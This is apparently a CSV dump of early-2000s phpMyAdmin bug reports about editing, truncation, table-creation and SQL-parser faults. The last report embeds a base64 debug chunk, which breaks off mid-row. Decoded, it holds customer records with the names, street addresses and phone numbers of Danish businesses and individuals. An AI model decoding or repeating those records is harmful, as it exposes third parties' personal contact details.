MySQL 3.23.39 PHP 4.1.2 Apache 1.3.20 When no index is defined and you use the amp;quot;Edit amp;quot; buttons to edit records, specifically adding new data to a previously empty field, the new data will be added to multiple records.
Specific case example Fields id smallint 6)) status tinytext) price tinytext) etv tinytext) grouping tinytext) stock smallint 6)) name tinytext) sets tinytext) rarity tinytext) type tinytext) momentum tinytext) method tinytext) keywords tinytext) text text) sold smallint 6)) no index defined Placed 2 records 1|Active|0.01|0.02|WA|1|Chop|1E|Common|Special||| |Play to do 4 dmg|0 167|Active|0.15|0.30|WA|1|Chop|2E|Uncommon|Speci al||||Play to do 6 dmg|0 Then added a field strategy text) after text text) Clicked Edit on record 167, Added text to strategy field.
It then showed up in both record 1 and record 167.
Original URL https sourceforge.net p phpmyadmin bugs 530 https sourceforge.net p phpmyadmin bugs 530 Original author anonymous Found in version 2.2.5 rc1","bug"
"24444","6900","2.3.0 rc4) MySQL 4, Tables need repair after empty.
I m using 2.3.0 rc4 on RH 7.2 php 4.2.2 mysql 4.0.2.
When I use Empty it truncates the table, but doesn t do anything with the index table.
So when I try to use the table it breaks because the index is not in sync with the data file now.
Once I run a repair optimize table on the table I just emptied it works perfectly.
Perhaps when you do a truncate, you should throw in an optimize repair table right after that to ensure that the table will not corrupt.
The corruption error I get is about an index being outside the filesize of the index.
If you have any questions please feel free to contact me tim!at!thelogichouse.com Tim Original URL https sourceforge.net p phpmyadmin bugs 531 https sourceforge.net p phpmyadmin bugs 531 Original author timcrider Found in version 2.3.0 rc4","bug"
"24444","6901","2.3.0 rc3) By default radio button for primary key.
By default radio button for primary key are selected for all fields while creating a new table.
As not all the fields are primary key for any tables.
IT would be quite good to see by default amp;quot; amp;quot; radio button is selected, so user creating new tables dont need to uncheck all the radio buttons.
Otherwise its quite irratating for the person creating tables using add table wizard Sachin Parekh GlobalwebwiseIndia Original URL https sourceforge.net p phpmyadmin bugs 532 https sourceforge.net p phpmyadmin bugs 532 Original author anonymous Found in version 2.3.0 rc3","bug"
"24444","6902","2.3.0 rc4) Bug in the SQL parser.
Appeared while trying to make a txt file insert 550 kb) You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT JElkOiBzcWxwYXJzZXIubGliLnBocCx2IDEuMTUgMjAw Mi8wNy8yNiAxODozMDo1OSBsZW05IEV4 cCAkPGJyIC8 CldoeSBkaWQgd2UgZ2V0IGhlcmU IDE4 NSAxODYgMTY0OTM8YnIgLz4KTGVmdG92 ZXI6INg8YnIgLz4KQTogMTg1IDE4NjxiciAvPgpTUUw6IGl uc2VydCBpbnRvIGRlYml0b3JfZGF0 YSAoa29udG8sIG5hdm4sIGFkcmVzc2UxLCBhZHJlc3Nl MiwgYWRyZXNzZTMsIHBvc3RuciwgbGFu ZCwgYXR0ZW50aW9uLCBzcHJvZywgdGVsZWZvbiwgZ mF4LCBlbWFpbCwgd3d3LCBiZXRhbGluZywg Y3ZyLCByYWJhdCkgdmFsdWVzICgnMzA0MzM4NzUn LCAnREFOJ1MgQVVUTycsICdI2EpMVU5EVkVK IDggSEFMIEUnLCAnVVZFTFNFJywgJycsICczNTQwJyw gJzAwOCcsICcnLCAnJycnLCAnJywgJycs ICcnLCAnJywgJ0tPTlRBTlQnLCAnJywgJzEnKTsNCmluc 2VydCBpbnRvIGRlYml0b3JfZGF0YSAo a29udG8sIG5hdm4sIGFkcmVzc2UxLCBhZHJlc3NlMiwg YWRyZXNzZTMsIHBvc3RuciwgbGFuZCwg YXR0ZW50aW9uLCBzcHJvZywgdGVsZWZvbiwgZmF4L CBlbWFpbCwgd3d3LCBiZXRhbGluZywgY3Zy LCByYWJhdCkgdmFsdWVzICgnMzA0MzU2MDknLCAn TUcgQklMRVInLCAnTUFSVElOIEdSQVZNQU5E JywgJ1LYRE1FTExFTVZFSiAxJywgJycsICcyMzAwJywg JzAwOCcsICcnLCAnJycnLCAnQklMOiAz MDQzIDU2MDknLCAnJywgJycsICcnLCAnS09OVEFOV CcsICcnLCAnMScpOw0KaW5zZXJ0IGludG8g ZGViaXRvcl9kYXRhIChrb250bywgbmF2biwgYWRyZXNzZ TEsIGFkcmVzc2UyLCBhZHJlc3NlMywg cG9zdG5yLCBsYW5kLCBhdHRlbnRpb24sIHNwcm9nLC B0ZWxlZm9uLCBmYXgsIGVtYWlsLCB3d3cs IGJldGFsaW5nLCBjdnIsIHJhYmF0KSB2YWx1ZXMgKCc zMDQzNjczMycsICdBVVRPVFJBTlNQT1JU IFdJTExZJywgJycsICcnLCAnJywgJycsICcwMDgnLCAnJ ywgJycnJywgJycsICcnLCAnJywgJycs ICdLT05UQU5UJywgJycsICcwJyk7DQppbnNlcnQgaW50 byBkZWJpdG9yX2RhdGEgKGtvbnRvLCBu YXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmVzc2U zLCBwb3N0bnIsIGxhbmQsIGF0dGVudGlv biwgc3Byb2csIHRlbGVmb24sIGZheCwgZW1haWwsIHd3 dywgYmV0YWxpbmcsIGN2ciwgcmFiYXQp IHZhbHVlcyAoJzMwNDM3MzAwJywgJ1VEIEhFUkxFVlN FTiBBVVRPTU9JQklMRVInLCAnS09OR0VW RUpFTiA5MicsICcnLCAnJywgJzI4NDAnLCAnMDA4Jywg JycsICcnJycsICcnLCAnJywgJycsICcn LCAnS09OVEFOVCcsICcnLCAnMScpOw0KaW5zZXJ0I GludG8gZGViaXRvcl9kYXRhIChrb250bywg bmF2biwgYWRyZXNzZTEsIGFkcmVzc2UyLCBhZHJlc3 NlMywgcG9zdG5yLCBsYW5kLCBhdHRlbnRp b24sIHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVtYWlsLC B3d3csIGJldGFsaW5nLCBjdnIsIHJhYmF0 KSB2YWx1ZXMgKCczMDQzOTc4NScsICdCT0JCTyBU QVhBJywgJ0xBTkcgMTIzJywgJycsICcnLCAn JywgJzAwOCcsICcnLCAnJycnLCAnJywgJycsICcnLCAn JywgJ0tPTlRBTlQnLCAnJywgJzAnKTsN Cmluc2VydCBpbnRvIGRlYml0b3JfZGF0YSAoa29udG8sI G5hdm4sIGFkcmVzc2UxLCBhZHJlc3Nl MiwgYWRyZXNzZTMsIHBvc3RuciwgbGFuZCwgYXR0ZW 50aW9uLCBzcHJvZywgdGVsZWZvbiwgZmF4 LCBlbWFpbCwgd3d3LCBiZXRhbGluZywgY3ZyLCByYWJ hdCkgdmFsdWVzICgnMzA0NDQxNTAnLCAn UEVURVJTIEFVVE8nLCAnVNhNUkVSR1JBVlNHQURFI DE3JywgJycsICcnLCAnMjQ1MCcsICcwMDgn LCAnT1RUTycsICcnJycsICcnLCAnJywgJycsICcnLCAnS 09OVEFOVCcsICcnLCAnMScpOw0KaW5z ZXJ0IGludG8gZGViaXRvcl9kYXRhIChrb250bywgbmF2biw gYWRyZXNzZTEsIGFkcmVzc2UyLCBh ZHJlc3NlMywgcG9zdG5yLCBsYW5kLCBhdHRlbnRpb24 sIHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVt YWlsLCB3d3csIGJldGFsaW5nLCBjdnIsIHJhYmF0KSB2 YWx1ZXMgKCczMDQ1MDE5NycsICcnLCAn QmlsIFRMRiB2YXJldHVyIGdhbW1lbCB1ZGflcicsICdFci BzYXQgcOUgc3ZhciBUTEYnLCAnJywg JycsICcwMDgnLCAnJywgJycnJywgJycsICcnLCAnJywgJ ycsICdLT05UQU5UJywgJycsICcwJyk7 DQppbnNlcnQgaW50byBkZWJpdG9yX2RhdGEgKGtvbn RvLCBuYXZuLCBhZHJlc3NlMSwgYWRyZXNz ZTIsIGFkcmVzc2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVu dGlvbiwgc3Byb2csIHRlbGVmb24sIGZh eCwgZW1haWwsIHd3dywgYmV0YWxpbmcsIGN2ciwgc mFiYXQpIHZhbHVlcyAoJzMwNDUwNzgzJywg J0pPSE5OWSBMSU5ESEFSRCcsICdFTkdIQVZFR8VS RFNWRUogMTUnLCAnJywgJycsICczNDAwJywg JzAwOCcsICdCaWwgNDAzMCAyMzg1JywgJycnJywgJz QyMjg3NDgzJywgJycsICcnLCAnJywgJ0tP TlRBTlQnLCAnJywgJzAnKTsNCmluc2VydCBpbnRvIGRl Yml0b3JfZGF0YSAoa29udG8sIG5hdm4s IGFkcmVzc2UxLCBhZHJlc3NlMiwgYWRyZXNzZTMsIHB vc3RuciwgbGFuZCwgYXR0ZW50aW9uLCBz cHJvZywgdGVsZWZvbiwgZmF4LCBlbWFpbCwgd3d3LC BiZXRhbGluZywgY3ZyLCByYWJhdCkgdmFs dWVzICgnMzA0NTA4MTcnLCAnRVhQRVJUIEdVTFZFJ ywgJ1JPREFMU1ZFSiAyJywgJycsICcnLCAn NDA0MCcsICcwMDgnLCAnJywgJycnJywgJycsICcnLCA nJywgJycsICdLT05UQU5UJywgJycsICcw Jyk7DQppbnNlcnQgaW50byBkZWJpdG9yX2RhdGEgKG tvbnRvLCBuYXZuLCBhZHJlc3NlMSwgYWRy ZXNzZTIsIGFkcmVzc2UzLCBwb3N0bnIsIGxhbmQsIGF0 dGVudGlvbiwgc3Byb2csIHRlbGVmb24s IGZheCwgZW1haWwsIHd3dywgYmV0YWxpbmcsIGN2ci wgcmFiYXQpIHZhbHVlcyAoJzMwNDUxNDIy JywgJ0JKQVJORSBHLiBKT0hBTlNFTicsICdWT0dOTUF ORCcsICdHUklNU1RSVVBWRUogMTAxIEIn LCAnJywgJzMzMTAnLCAnMDA4JywgJycsICcnJycsICd CSUw6IDMwNDUgMTQyMicsICcnLCAnJywg JycsICdLT05UQU5UJywgJycsICcwJyk7DQppbnNlcnQga W50byBkZWJpdG9yX2RhdGEgKGtvbnRv LCBuYXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmV zc2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVu dGlvbiwgc3Byb2csIHRlbGVmb24sIGZheCwgZW1haWws IHd3dywgYmV0YWxpbmcsIGN2ciwgcmFi YXQpIHZhbHVlcyAoJzMwNDUxNTg4JywgJ0NIUklTVElB TiBCTElLRU5CRVJHJywgJ1LYUlNBTkdF UlZFSiA2JywgJycsICcnLCAnMzM5MCcsICcwMDgnLCA nJywgJycnJywgJycsICcnLCAnJywgJycs ICc4RCBORVRUTycsICcnLCAnMCcpOw0KaW5zZXJ0IG ludG8gZGViaXRvcl9kYXRhIChrb250bywg bmF2biwgYWRyZXNzZTEsIGFkcmVzc2UyLCBhZHJlc3 NlMywgcG9zdG5yLCBsYW5kLCBhdHRlbnRp b24sIHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVtYWlsLC B3d3csIGJldGFsaW5nLCBjdnIsIHJhYmF0 KSB2YWx1ZXMgKCczMDQ1MzYwMicsICdI2EpUUllLU1 BVTEVSIFJFUEVSQVRJT04nLCAnJywgJycs ICcnLCAnJywgJzAwOCcsICcnLCAnJycnLCAnJywgJycsI CcnLCAnJywgJ0tPTlRBTlQnLCAnJywg JzAnKTsNCmluc2VydCBpbnRvIGRlYml0b3JfZGF0YSAo a29udG8sIG5hdm4sIGFkcmVzc2UxLCBh ZHJlc3NlMiwgYWRyZXNzZTMsIHBvc3RuciwgbGFuZCwg YXR0ZW50aW9uLCBzcHJvZywgdGVsZWZv biwgZmF4LCBlbWFpbCwgd3d3LCBiZXRhbGluZywgY3Zy LCByYWJhdCkgdmFsdWVzICgnMzA0NTM4 NTgnLCAnSkVOUyBNQUlCTycsICcnLCAnJywgJycsICc nLCAnMDA4JywgJycsICcnJycsICcnLCAn JywgJycsICcnLCAnS09OVEFOVCcsICcnLCAnMCcpOw 0KaW5zZXJ0IGludG8gZGViaXRvcl9kYXRh IChrb250bywgbmF2biwgYWRyZXNzZTEsIGFkcmVzc2U yLCBhZHJlc3NlMywgcG9zdG5yLCBsYW5k LCBhdHRlbnRpb24sIHNwcm9nLCB0ZWxlZm9uLCBmYX gsIGVtYWlsLCB3d3csIGJldGFsaW5nLCBj dnIsIHJhYmF0KSB2YWx1ZXMgKCczMDQ1OTAyOScsI CdLLkouIEFVVE8nLCAnU1RFTkxJTExFVkVK IDEyOScsICcnLCAnJywgJzM2NjAnLCAnMDA4JywgJzM vMiA5NiBVQkVLRU5EVCBFRlRFUiBBRFJF U1NFJywgJycnJywgJycsICcnLCAnJywgJycsICdLT05UQ U5UJywgJycsICcwJyk7DQppbnNlcnQg aW50byBkZWJpdG9yX2RhdGEgKGtvbnRvLCBuYXZuLC BhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmVz c2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVudGlvbiwgc3By b2csIHRlbGVmb24sIGZheCwgZW1haWws IHd3dywgYmV0YWxpbmcsIGN2ciwgcmFiYXQpIHZhbHV lcyAoJzMwNDU5MjY3JywgJ8VMU0fFUkRF IFBMQU5URSAmIEhBVkVTRVJWSUNFJywgJ1JFTkUg R0VKUEVOJywgJycsICcnLCAnJywgJzAwOCcs ICdWSSBIQVIgMjAwIFRJTEdPREUgUFIgMjAtOC05Nics ICcnJycsICcnLCAnJywgJycsICcnLCAn S09OVEFOVCcsICcnLCAnMCcpOw0KaW5zZXJ0IGlud G8gZGViaXRvcl9kYXRhIChrb250bywgbmF2 biwgYWRyZXNzZTEsIGFkcmVzc2UyLCBhZHJlc3NlMyw gcG9zdG5yLCBsYW5kLCBhdHRlbnRpb24s IHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVtYWlsLCB3d3 csIGJldGFsaW5nLCBjdnIsIHJhYmF0KSB2 YWx1ZXMgKCczMDQ2MTU2OCcsICdUUkFOU1BPUlQ gT0cgSEFWRVNFUlZJQ0UnLCAnS0xBVVMgS1JJ U1RPRkZFUlNFTicsICdNRUzYU0VWRUogMzUnLCAnJ ywgJzMzMjAnLCAnMDA4JywgJycsICcnJycs ICcnLCAnJywgJycsICcnLCAnS09OVEFOVCcsICcnLCA nMCcpOw0KaW5zZXJ0IGludG8gZGViaXRv cl9kYXRhIChrb250bywgbmF2biwgYWRyZXNzZTEsIGFk cmVzc2UyLCBhZHJlc3NlMywgcG9zdG5y LCBsYW5kLCBhdHRlbnRpb24sIHNwcm9nLCB0ZWxlZm 9uLCBmYXgsIGVtYWlsLCB3d3csIGJldGFs aW5nLCBjdnIsIHJhYmF0KSB2YWx1ZXMgKCczMDQ2M zQ0NycsICdMLksuIE1VUkVSICYgU1RJTExB RFMgRklSTUFFVCcsICdISk9SVEVOUyBLVkFSVEVSI DI0JywgJ0VKQlknLCAnJywgJzQ2MjMnLCAn MDA4JywgJycsICcnJycsICcnLCAnJywgJycsICcnLCAnS 09OVEFOVCcsICcnLCAnMCcpOw0KaW5z ZXJ0IGludG8gZGViaXRvcl9kYXRhIChrb250bywgbmF2biw gYWRyZXNzZTEsIGFkcmVzc2UyLCBh ZHJlc3NlMywgcG9zdG5yLCBsYW5kLCBhdHRlbnRpb24 sIHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVt YWlsLCB3d3csIGJldGFsaW5nLCBjdnIsIHJhYmF0KSB2 YWx1ZXMgKCczMDQ4MTY4NScsICdGSU5O IE1FS0FOSUtFUicsICdN2FJL2FZWRUogMTgnLCAnJyw gJycsICc0NDQwJywgJzAwOCcsICcnLCAn JycnLCAnJywgJycsICcnLCAnJywgJ0tPTlRBTlQnLCAnJy wgJzEnKTsNCmluc2VydCBpbnRvIGRl Yml0b3JfZGF0YSAoa29udG8sIG5hdm4sIGFkcmVzc2U xLCBhZHJlc3NlMiwgYWRyZXNzZTMsIHBv c3RuciwgbGFuZCwgYXR0ZW50aW9uLCBzcHJvZywgdG VsZWZvbiwgZmF4LCBlbWFpbCwgd3d3LCBi ZXRhbGluZywgY3ZyLCByYWJhdCkgdmFsdWVzICgnMz A0OTEwMjMnLCAnUE9VTCBFUklLIFBFVEVS U0VOUyBBVVRPJywgJ0RBTVZFSkVOIDEnLCAnJywgJ ycsICczNDAwJywgJzAwOCcsICcnLCAnJycn LCAnJywgJycsICcnLCAnJywgJ0tPTlRBTlQnLCAnJywgJ zEnKTsNCmluc2VydCBpbnRvIGRlYml0 b3JfZGF0YSAoa29udG8sIG5hdm4sIGFkcmVzc2UxLCB hZHJlc3NlMiwgYWRyZXNzZTMsIHBvc3Ru ciwgbGFuZCwgYXR0ZW50aW9uLCBzcHJvZywgdGVsZ WZvbiwgZmF4LCBlbWFpbCwgd3d3LCBiZXRh bGluZywgY3ZyLCByYWJhdCkgdmFsdWVzICgnMzA1M Tk1MjgnLCAnSthSR0VOIEhBTlNFTlMgQVVU TycsICdWRURTS9hMTEVWRUogNDAnLCAnJywgJycsI Cc0NjgxJywgJzAwOCcsICcnLCAnJycnLCAn JywgJycsICcnLCAnJywgJ0tPTlRBTlQnLCAnJywgJzEnK TsNCmluc2VydCBpbnRvIGRlYml0b3Jf ZGF0YSAoa29udG8sIG5hdm4sIGFkcmVzc2UxLCBhZH Jlc3NlMiwgYWRyZXNzZTMsIHBvc3Ruciwg bGFuZCwgYXR0ZW50aW9uLCBzcHJvZywgdGVsZWZvbi wgZmF4LCBlbWFpbCwgd3d3LCBiZXRhbGlu ZywgY3ZyLCByYWJhdCkgdmFsdWVzICgnMzA1MzI4N DYnLCAnSEVSUklOR0zYU0UgRMZLJywgJ0hW RURTVFJVUFZFSiA0JywgJycsICcnLCAnMzY3MCcsICc wMDgnLCAnJywgJycnJywgJ0ZBWCA0Njc4 IDg5NDUnLCAnJywgJycsICcnLCAnS09OVEFOVCcsICc nLCAnMCcpOw0KaW5zZXJ0IGludG8gZGVi aXRvcl9kYXRhIChrb250bywgbmF2biwgYWRyZXNzZTEsI GFkcmVzc2UyLCBhZHJlc3NlMywgcG9z dG5yLCBsYW5kLCBhdHRlbnRpb24sIHNwcm9nLCB0Z WxlZm9uLCBmYXgsIGVtYWlsLCB3d3csIGJl dGFsaW5nLCBjdnIsIHJhYmF0KSB2YWx1ZXMgKCczM DUzODQyMScsICdBQlNPTFVUIEJJTFNBTEcn LCAnSE9WRURHQURFTiA1MCcsICcnLCAnJywgJzQxN DAnLCAnMDA4JywgJycsICcnJycsICcnLCAn JywgJycsICcnLCAnS09OVEFOVCcsICcnLCAnMScpOw 0KaW5zZXJ0IGludG8gZGViaXRvcl9kYXRh IChrb250bywgbmF2biwgYWRyZXNzZTEsIGFkcmVzc2U yLCBhZHJlc3NlMywgcG9zdG5yLCBsYW5k LCBhdHRlbnRpb24sIHNwcm9nLCB0ZWxlZm9uLCBmYX gsIGVtYWlsLCB3d3csIGJldGFsaW5nLCBj dnIsIHJhYmF0KSB2YWx1ZXMgKCczMDU0MDA1NCcsI CdBVVRPVFJBTlNQT1JUJywgJycsICcnLCAn JywgJycsICcwMDgnLCAnTUlDSEFFTCcsICcnJycsICcnL CAnJywgJycsICcnLCAnS09OVEFOVCcs ICcnLCAnMCcpOw0KaW5zZXJ0IGludG8gZGViaXRvcl9k YXRhIChrb250bywgbmF2biwgYWRyZXNz ZTEsIGFkcmVzc2UyLCBhZHJlc3NlMywgcG9zdG5yLCB sYW5kLCBhdHRlbnRpb24sIHNwcm9nLCB0 ZWxlZm9uLCBmYXgsIGVtYWlsLCB3d3csIGJldGFsaW5 nLCBjdnIsIHJhYmF0KSB2YWx1ZXMgKCcz MDU0MjExNScsICdH2FJM2FNFIEFVVE9JTVBPUlQgS EFNQlVSRycsICdPVFRFTlNFTkVSU1RSQVNT RSAxNTAnLCAnMjI1MjUgSEFNQlVSRycsICdERTgxMj QyOTcwJywgJycsICdEMDQnLCAnJywgJycn JywgJycsICcnLCAnJywgJycsICdLT05UQU5UJywgJycsI CcwJyk7DQppbnNlcnQgaW50byBkZWJp dG9yX2RhdGEgKGtvbnRvLCBuYXZuLCBhZHJlc3NlMSw gYWRyZXNzZTIsIGFkcmVzc2UzLCBwb3N0 bnIsIGxhbmQsIGF0dGVudGlvbiwgc3Byb2csIHRlbGVmb 24sIGZheCwgZW1haWwsIHd3dywgYmV0 YWxpbmcsIGN2ciwgcmFiYXQpIHZhbHVlcyAoJzMwNTQ 0NzQ0JywgJ1NPUtggTUlOSUZMWVQnLCAn Vi9IRU5SSUsgQU5EUkVTRU4nLCAnRlJFREVSSUtTQk VSR1ZFSiAyOCcsICcnLCAnNDE4MCcsICcw MDgnLCAnJywgJycnJywgJycsICcnLCAnJywgJycsICdLT 05UQU5UJywgJycsICcwJyk7DQppbnNl cnQgaW50byBkZWJpdG9yX2RhdGEgKGtvbnRvLCBuYX ZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGFk cmVzc2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVudGlvbiwg c3Byb2csIHRlbGVmb24sIGZheCwgZW1h aWwsIHd3dywgYmV0YWxpbmcsIGN2ciwgcmFiYXQpIH ZhbHVlcyAoJzMwNTQ1MTI2JywgJ0NBUkwg U9hSRU5TRU4nLCAnU0VMU0tBQlNWRUogMTgnLCAn JywgJycsICc0OTAwJywgJzAwOCcsICcnLCAn JycnLCAnJywgJycsICcnLCAnJywgJ0tPTlRBTlQnLCAnJy wgJzAnKTsNCmluc2VydCBpbnRvIGRl Yml0b3JfZGF0YSAoa29udG8sIG5hdm4sIGFkcmVzc2U xLCBhZHJlc3NlMiwgYWRyZXNzZTMsIHBv c3RuciwgbGFuZCwgYXR0ZW50aW9uLCBzcHJvZywgdG VsZWZvbiwgZmF4LCBlbWFpbCwgd3d3LCBi ZXRhbGluZywgY3ZyLCByYWJhdCkgdmFsdWVzICgnMz A1NDkyNDcnLCAnVC5QLkggQVVUTycsICfY Uk5FVkVKIDEyJywgJycsICcnLCAnNDYwMCcsICcwMD gnLCAnJywgJycnJywgJycsICcnLCAnJywg JycsICdLT05UQU5UJywgJycsICcxJyk7DQppbnNlcnQga W50byBkZWJpdG9yX2RhdGEgKGtvbnRv LCBuYXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmV zc2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVu dGlvbiwgc3Byb2csIHRlbGVmb24sIGZheCwgZW1haWws IHd3dywgYmV0YWxpbmcsIGN2ciwgcmFi YXQpIHZhbHVlcyAoJzMwNTUxMjI5JywgJ0NJVFkgQklM RVInLCAnUklOR1NURURHQURFIDY3Jywg JycsICcnLCAnNDAwMCcsICcwMDgnLCAnJywgJycnJyw gJzQyMzY0MTA3JywgJycsICcnLCAnJywg J0tPTlRBTlQnLCAnJywgJzEnKTsNCmluc2VydCBpbnRvI GRlYml0b3JfZGF0YSAoa29udG8sIG5h dm4sIGFkcmVzc2UxLCBhZHJlc3NlMiwgYWRyZXNzZT MsIHBvc3RuciwgbGFuZCwgYXR0ZW50aW9u LCBzcHJvZywgdGVsZWZvbiwgZmF4LCBlbWFpbCwgd3 d3LCBiZXRhbGluZywgY3ZyLCByYWJhdCkg dmFsdWVzICgnMzA1NTE0OTMnLCAnQklMIFRMRiBC SkFSTkUgUCcsICcnLCAnJywgJycsICcnLCAn MDA4JywgJycsICcnJycsICcnLCAnJywgJycsICcnLCAnS 09OVEFOVCcsICcnLCAnMCcpOw0KaW5z ZXJ0IGludG8gZGViaXRvcl9kYXRhIChrb250bywgbmF2biw gYWRyZXNzZTEsIGFkcmVzc2UyLCBh ZHJlc3NlMywgcG9zdG5yLCBsYW5kLCBhdHRlbnRpb24 sIHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVt YWlsLCB3d3csIGJldGFsaW5nLCBjdnIsIHJhYmF0KSB2 YWx1ZXMgKCczMDU1NjQyNicsICdUSE9N QVMgTklFTFNFTicsICdIT0xCxktWRUogMSBCIFNUIFRI JywgJycsICcnLCAnNDM3MCcsICcwMDgn LCAnJywgJycnJywgJycsICcnLCAnJywgJycsICdLT05UQ U5UJywgJycsICcwJyk7DQppbnNlcnQg aW50byBkZWJpdG9yX2RhdGEgKGtvbnRvLCBuYXZuLC BhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmVz c2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVudGlvbiwgc3By b2csIHRlbGVmb24sIGZheCwgZW1haWws IHd3dywgYmV0YWxpbmcsIGN2ciwgcmFiYXQpIHZhbHV lcyAoJzMwNTk1MDA3JywgJ0ZSRURFUklL U1bGUksgSkVSTkhBTkRFTCcsICdJTkRVU1RSSVNLR UxMRVQgMjEnLCAnJywgJycsICczMzAwJywg JzAwOCcsICcnLCAnJycnLCAnJywgJycsICcnLCAnJywg J0tPTlRBTlQnLCAnJywgJzAnKTsNCmlu c2VydCBpbnRvIGRlYml0b3JfZGF0YSAoa29udG8sIG5hd m4sIGFkcmVzc2UxLCBhZHJlc3NlMiwg YWRyZXNzZTMsIHBvc3RuciwgbGFuZCwgYXR0ZW50a W9uLCBzcHJvZywgdGVsZWZvbiwgZmF4LCBl bWFpbCwgd3d3LCBiZXRhbGluZywgY3ZyLCByYWJhdC kgdmFsdWVzICgnMzA2MTA2MDInLCAnS0VO TkVUSCBQT1VMU0VOJywgJ1LYTk5FVkVKIDE5JywgJ ycsICcnLCAnMzQ4MCcsICcwMDgnLCAnJywg JycnJywgJycsICcnLCAnJywgJycsICdLT05UQU5UJywgJ ycsICcwJyk7DQppbnNlcnQgaW50byBk ZWJpdG9yX2RhdGEgKGtvbnRvLCBuYXZuLCBhZHJlc3Nl MSwgYWRyZXNzZTIsIGFkcmVzc2UzLCBw b3N0bnIsIGxhbmQsIGF0dGVudGlvbiwgc3Byb2csIHRlbG Vmb24sIGZheCwgZW1haWwsIHd3dywg YmV0YWxpbmcsIGN2ciwgcmFiYXQpIHZhbHVlcyAoJz MwNjQwNDA4JywgJ0JJTCBUTEYgS0FSU1RF TiBTQ0hXRUlaJywgJycsICcnLCAnJywgJycsICcwMDgnL CAnJywgJycnJywgJycsICcnLCAnJywg JycsICdLT05UQU5UJywgJycsICcwJyk7DQppbnNlcnQga W50byBkZWJpdG9yX2RhdGEgKGtvbnRv LCBuYXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmV zc2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVu dGlvbiwgc3Byb2csIHRlbGVmb24sIGZheCwgZW1haWws IHd3dywgYmV0YWxpbmcsIGN2ciwgcmFi YXQpIHZhbHVlcyAoJzMwNjg1NDYxNScsICdGQS4gTU VTVVQg1lpZVVJUJywgJ1pJRUdSQVNUUkFT U0UgMScsICcxMjA1NyBCRVJMSU4nLCAnREVVVFND SExBTkQnLCAnJywgJzAwNCcsICcnLCAnJycn LCAnJywgJycsICcnLCAnJywgJ0tPTlRBTlQnLCAnJywgJ zAnKTsNCmluc2VydCBpbnRvIGRlYml0 b3JfZGF0YSAoa29udG8sIG5hdm4sIGFkcmVzc2UxLCB hZHJlc3NlMiwgYWRyZXNzZTMsIHBvc3Ru ciwgbGFuZCwgYXR0ZW50aW9uLCBzcHJvZywgdGVsZ WZvbiwgZmF4LCBlbWFpbCwgd3d3LCBiZXRh bGluZywgY3ZyLCByYWJhdCkgdmFsdWVzICgnMzA3M DEzMzUnLCAnVEFYSSBWT0dOTUFORCBHRVJU SCBT2EfFUkQnLCAnJywgJycsICcnLCAnJywgJzAwOCc sICdLWUVEJywgJycnJywgJycsICcnLCAn JywgJycsICdLT05UQU5UJywgJycsICcwJyk7DQppbnNlc nQgaW50byBkZWJpdG9yX2RhdGEgKGtv bnRvLCBuYXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGF kcmVzc2UzLCBwb3N0bnIsIGxhbmQsIGF0 dGVudGlvbiwgc3Byb2csIHRlbGVmb24sIGZheCwgZW1h aWwsIHd3dywgYmV0YWxpbmcsIGN2ciwg cmFiYXQpIHZhbHVlcyAoJzMwODI4NjkwJywgJ0tPRUQg Qk1XIElNUE9SVCcsICcnLCAnJywgJycs ICcnLCAnMDA4JywgJ05JQ09MQUogQlJFR0VI2EonLCA nJycnLCAnMzA4NjI2NzInLCAnJywgJycs ICcnLCAnS09OVEFOVCcsICcnLCAnMCcpOw0KaW5zZ XJ0IGludG8gZGViaXRvcl9kYXRhIChrb250 bywgbmF2biwgYWRyZXNzZTEsIGFkcmVzc2UyLCBhZH Jlc3NlMywgcG9zdG5yLCBsYW5kLCBhdHRl bnRpb24sIHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVtYW lsLCB3d3csIGJldGFsaW5nLCBjdnIsIHJh YmF0KSB2YWx1ZXMgKCczMDg2MjY3MicsICdCTVcgT 1BIVUdHRVIgS09FRCcsICdTRSBLT0VEIEJN VyBJTVBPUlQnLCAnJywgJycsICcnLCAnMDA4JywgJyc sICcnJycsICcnLCAnJywgJycsICcnLCAn S09OVEFOVCcsICcnLCAnMCcpOw0KaW5zZXJ0IGlud G8gZGViaXRvcl9kYXRhIChrb250bywgbmF2 biwgYWRyZXNzZTEsIGFkcmVzc2UyLCBhZHJlc3NlMyw gcG9zdG5yLCBsYW5kLCBhdHRlbnRpb24s IHNwcm9nLCB0ZWxlZm9uLCBmYXgsIGVtYWlsLCB3d3 csIGJldGFsaW5nLCBjdnIsIHJhYmF0KSB2 YWx1ZXMgKCczMDg3NDIwNycsICdKQU4gTklFTFNFTi csICdBR0VSSNhKRU4gMTknLCAnJywgJycs ICczNTUwJywgJzAwOCcsICdKQU4nLCAnJycnLCAnMz A4NzQyMDcnLCAnJywgJycsICcnLCAnS09O VEFOVCcsICcnLCAnMCcpOw0KaW5zZXJ0IGludG8gZG ViaXRvcl9kYXRhIChrb250bywgbmF2biwg YWRyZXNzZTEsIGFkcmVzc2UyLCBhZHJlc3NlMywgcG 9zdG5yLCBsYW5kLCBhdHRlbnRpb24sIHNw cm9nLCB0ZWxlZm9uLCBmYXgsIGVtYWlsLCB3d3csIG JldGFsaW5nLCBjdnIsIHJhYmF0KSB2YWx1 